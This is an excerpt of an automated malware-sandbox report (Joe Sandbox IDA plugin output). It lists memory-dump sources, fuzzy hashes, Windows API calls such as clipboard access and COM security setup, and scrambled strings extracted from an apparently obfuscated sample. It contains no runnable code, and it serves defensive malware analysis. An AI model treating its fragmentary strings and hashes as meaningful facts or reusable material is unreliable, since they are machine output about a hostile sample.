                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 007C9A10
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: 43601ff53c886443771a100a64f2e7f00bc90e8bc1fc3298515c6f44d10e5c47
                                                                                                                                      • Instruction ID: e61d0bd5f227b7b2fd5468db9228ae08bafd2386b63e9676aeb7a18f04feb13e
                                                                                                                                      • Opcode Fuzzy Hash: 43601ff53c886443771a100a64f2e7f00bc90e8bc1fc3298515c6f44d10e5c47
                                                                                                                                      • Instruction Fuzzy Hash: DFC01230956160ABC2146F04DD09FAABB78AF0B301F00A008A00C7B1B1C778A801CA9C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: @
                                                                                                                                      • API String ID: 2994545307-2766056989
                                                                                                                                      • Opcode ID: 0046cf233a04f666e046a8942aafcc65fc15f121ba2ede59dbe27c9056b82463
                                                                                                                                      • Instruction ID: 29d99acc610b5d3137d603d3fa550a4aa90b4681a32c7496636825256376b077
                                                                                                                                      • Opcode Fuzzy Hash: 0046cf233a04f666e046a8942aafcc65fc15f121ba2ede59dbe27c9056b82463
                                                                                                                                      • Instruction Fuzzy Hash: 864159726043109BD7248F64DC95BBBBBA2FFE4318F09462DE5855B3A0E779AC00C782
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: \^
                                                                                                                                      • API String ID: 0-805220809
                                                                                                                                      • Opcode ID: beb7ae3c443ba31947fd612fd4ce57dac988dd6e76cfcea8b565407adc3b6d51
                                                                                                                                      • Instruction ID: 8aafd77e155dfd9df1d1034cdab3936efae2a3317763f2657e2b5dc6e5ce75bb
                                                                                                                                      • Opcode Fuzzy Hash: beb7ae3c443ba31947fd612fd4ce57dac988dd6e76cfcea8b565407adc3b6d51
                                                                                                                                      • Instruction Fuzzy Hash: CC210272E402268BC710CF64D8807AAB7F2BB89320F298168C681B7245D774AC02CB94
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 0011ee2d399c06018ee09b0c3442990dcab529055946b56a9fef2a01dad725d4
                                                                                                                                      • Instruction ID: 7f7d7b03e6af0212f03c6e3e50ea4db07c6efba40028a8d867eac95389d58e1f
                                                                                                                                      • Opcode Fuzzy Hash: 0011ee2d399c06018ee09b0c3442990dcab529055946b56a9fef2a01dad725d4
                                                                                                                                      • Instruction Fuzzy Hash: A2A14B76A157519BC714DF29CC80A6AB7A3FBD4720F09C63DE885872A5EB38EC11C781
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 8ebb05080e044a0f377f6f689aaf1da0292eed93c723edb11ab42a6437da8562
                                                                                                                                      • Instruction ID: d36a60bd1192ae4ee8ae2f4f471c8b28bcb8592f07afd7835769dbb7e615dd9b
                                                                                                                                      • Opcode Fuzzy Hash: 8ebb05080e044a0f377f6f689aaf1da0292eed93c723edb11ab42a6437da8562
                                                                                                                                      • Instruction Fuzzy Hash: 54715A7AA083209BD7249E399884B7BB3D2EBC4710F1AC23DDAC667341EA349C01C795
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: f4bc2de2f548a572877900267c9d3805c25a011ce692dcb33d236043bd1ae378
                                                                                                                                      • Instruction ID: e9dca81d120ad8ce52226ff4c95073abdff0aa119f6144efd0b4e001a93f715d
                                                                                                                                      • Opcode Fuzzy Hash: f4bc2de2f548a572877900267c9d3805c25a011ce692dcb33d236043bd1ae378
                                                                                                                                      • Instruction Fuzzy Hash: 80713D7160C3415BDB289F249C827BBB7A5EFD2315F18842CE98597252F23CEC16C352
                                                                                                                                      APIs
                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002), ref: 0079C82A
                                                                                                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 0079C979
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Initialize
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2538663250-0
                                                                                                                                      • Opcode ID: 55c70858291e14c3e7768db880e741ef2158e95cfd853dcc360a8075638ee975
                                                                                                                                      • Instruction ID: cadd6b3701a1c7cde4e6c4c130e2eeed542f12a3f2a15ea5f6491535e1ad74b7
                                                                                                                                      • Opcode Fuzzy Hash: 55c70858291e14c3e7768db880e741ef2158e95cfd853dcc360a8075638ee975
                                                                                                                                      • Instruction Fuzzy Hash: 9041E7B4910B40AFD370EF39D90B7137EB4AB05250F508B1EF8EA866D4E631A4198BD7
                                                                                                                                      APIs
                                                                                                                                      • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0079B03C,00000000,00000001), ref: 007CB582
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: cef86456ce2bf84915d9e37a58192b524c8012b37bb2c1137062b718e22d8ce5
                                                                                                                                      • Instruction ID: 04eff10fc0ebd8236e3e548198dc318e1bbfebb9625e193f43a90a04a98a60e7
                                                                                                                                      • Opcode Fuzzy Hash: cef86456ce2bf84915d9e37a58192b524c8012b37bb2c1137062b718e22d8ce5
                                                                                                                                      • Instruction Fuzzy Hash: 1BE0E532525520EBC3101B38BC0AF2B3778AF85710F09442DF505A6110EB3DE811C5A5
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: BlanketProxy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3890896728-0
                                                                                                                                      • Opcode ID: 5283d5d2577f8fa219b4f457039c011edd00f15148ae6b4181a576588ca3f236
                                                                                                                                      • Instruction ID: 28d5742eedd83a5f4e1564f7a9a3f96ae276ab72dcd98b181cd16a57e1e62504
                                                                                                                                      • Opcode Fuzzy Hash: 5283d5d2577f8fa219b4f457039c011edd00f15148ae6b4181a576588ca3f236
                                                                                                                                      • Instruction Fuzzy Hash: 30F0BDB46057018FE344DF25D5A871ABBF1FB94308F10991CE4958B350C7B9A949CF81
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: BlanketProxy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3890896728-0
                                                                                                                                      • Opcode ID: b1c8b4d3e47a13fac2e5e2cc39d7248283aa9c0487a44a8b907896777dc6f027
                                                                                                                                      • Instruction ID: f71b812bf27d0140353ed7b30fb08cc3ae02edc8ea99d460c21310fa12249cf9
                                                                                                                                      • Opcode Fuzzy Hash: b1c8b4d3e47a13fac2e5e2cc39d7248283aa9c0487a44a8b907896777dc6f027
                                                                                                                                      • Instruction Fuzzy Hash: 21F0B7701093019FE314DF60D1A870BBBE2ABC8318F10890CE0940B390C7BA96498F82
                                                                                                                                      APIs
                                                                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0079C9C7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeSecurity
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 640775948-0
                                                                                                                                      • Opcode ID: ac47685d4175cc390f71f0476b9edb39e65b3932afe3c0e9b383f88b14df3455
                                                                                                                                      • Instruction ID: 1026ae893df6db1da9f60d93c76c37099c29e977b043d053ff04deb8bbcffd9d
                                                                                                                                      • Opcode Fuzzy Hash: ac47685d4175cc390f71f0476b9edb39e65b3932afe3c0e9b383f88b14df3455
                                                                                                                                      • Instruction Fuzzy Hash: FAD092703C92407AE1644A08AD27F143761A311F15F344606B3A3EE2E1C9D47112860C
                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000), ref: 007C9A5D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                      • Opcode ID: a4e656ee5fa60cbb84e82d3f001b771c0d3069a42eb482a727989c854b8b6085
                                                                                                                                      • Instruction ID: f25654293a4e4376dec4fe3b7ec9a515889e588eb4964e98e7ae5b78093501d4
                                                                                                                                      • Opcode Fuzzy Hash: a4e656ee5fa60cbb84e82d3f001b771c0d3069a42eb482a727989c854b8b6085
                                                                                                                                      • Instruction Fuzzy Hash: 66C01232116826EBC6612B18BC0ABD62B25AF04321F068991F1089C0A5D63C8CA28998
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #V2h$0R/T$E*y,$P:W<$`>~0$ef$h.h $l6iH$q&u8$r2k4$x"p$$GI$KM
                                                                                                                                      • API String ID: 0-2276481665
                                                                                                                                      • Opcode ID: a8e63a5f31e508353695972cde312912c94a6556244fc881841ebd875ede47b9
                                                                                                                                      • Instruction ID: 4c8a5975e50e0a46434f67ee38141a03d429955a3c8bc980b4c763b4c869bfbb
                                                                                                                                      • Opcode Fuzzy Hash: a8e63a5f31e508353695972cde312912c94a6556244fc881841ebd875ede47b9
                                                                                                                                      • Instruction Fuzzy Hash: B691BAB561C3848FC7249F29D842BABBBF1EFC1304F05895CE5C49B251EB798905CB96
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: &!$04:5$0;$;}e;$JRj5$JRj5$Rfka$aOe $gnbY$jFPd$x$}
                                                                                                                                      • API String ID: 0-910685465
                                                                                                                                      • Opcode ID: 9cb759d489f57a9e6b297dd318a3997337be23c4bef80ff73e1fefe4e661577e
                                                                                                                                      • Instruction ID: b7a577c28a1e2f75c30c67f8f33356bd2a88b12f99cb7f417784ea25fc56d4c4
                                                                                                                                      • Opcode Fuzzy Hash: 9cb759d489f57a9e6b297dd318a3997337be23c4bef80ff73e1fefe4e661577e
                                                                                                                                      • Instruction Fuzzy Hash: CCA1D17114C3919BD722CF6994A035BFFE0AF97740F584A6CE4D55B382D339890AC7A2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -V($$2*'7$4)'$$5Vdw$8g~[$:$Z,37$\$?>$i1||$ips~$qez)$r
                                                                                                                                      • API String ID: 0-2291961604
                                                                                                                                      • Opcode ID: c313e175e9847ac144540d12d4342f7d727fdb9525b9356b0540b11206b25c25
                                                                                                                                      • Instruction ID: 7ab2a9f780c8040cbf013d6cd0fec3ca68be7467d11764c001cd8bc83b2731e8
                                                                                                                                      • Opcode Fuzzy Hash: c313e175e9847ac144540d12d4342f7d727fdb9525b9356b0540b11206b25c25
                                                                                                                                      • Instruction Fuzzy Hash: 4481DEB160C3D18BE335CF2594A17ABBFE2AFD2304F18895CC4DA5B246D6790506CBA7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: =B'+$D$ 7$H)#<$bx{$GI$KM
                                                                                                                                      • API String ID: 0-221937381
                                                                                                                                      • Opcode ID: 5849352fa781deb41a31238ac3f10c355f8b5ce4df74b3eaac8e25cc06da841e
                                                                                                                                      • Instruction ID: 94449881168b9199f1d9f34a01bcb117100aeaf95456aed58a5c20674fc5cc4f
                                                                                                                                      • Opcode Fuzzy Hash: 5849352fa781deb41a31238ac3f10c355f8b5ce4df74b3eaac8e25cc06da841e
                                                                                                                                      • Instruction Fuzzy Hash: 27220DB160C381CFC7249F64E8817ABBBE1AFD6304F04892CE5C58B352E7799905CB96
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 1006321803-2126386893
                                                                                                                                      • Opcode ID: e12e0e78b05a05740bc418b8e954cac4995d976f7aa6196664e715af3c8f9495
                                                                                                                                      • Instruction ID: 36ac429e7a29123ee9a3dbcb01a169aa3585a836ef188f220598aee5fbae8e18
                                                                                                                                      • Opcode Fuzzy Hash: e12e0e78b05a05740bc418b8e954cac4995d976f7aa6196664e715af3c8f9495
                                                                                                                                      • Instruction Fuzzy Hash: 66419D7160D381CFD305AFB8D98935EBFE1AB96304F09892DE4C58A382D67C854997A3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "#$2E$Bq$F771030F9526602D0EE189CCD4D6D92A$Qv$m~qF$yp$}J~u$~
                                                                                                                                      • API String ID: 0-3532175288
                                                                                                                                      • Opcode ID: 43a7f2524aee836279ec4469d0adc5871172dd2be15f3e516ea982b6075738bd
                                                                                                                                      • Instruction ID: ea39a429bc014e95f7aa9cc5882ee73c56bd8a15b59abad8815335a5b45f31ff
                                                                                                                                      • Opcode Fuzzy Hash: 43a7f2524aee836279ec4469d0adc5871172dd2be15f3e516ea982b6075738bd
                                                                                                                                      • Instruction Fuzzy Hash: 3EB1247160C7408BDB14CF24D891AABBBE1EBC2314F14496CE5D58B392DB3DD90ACB56
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
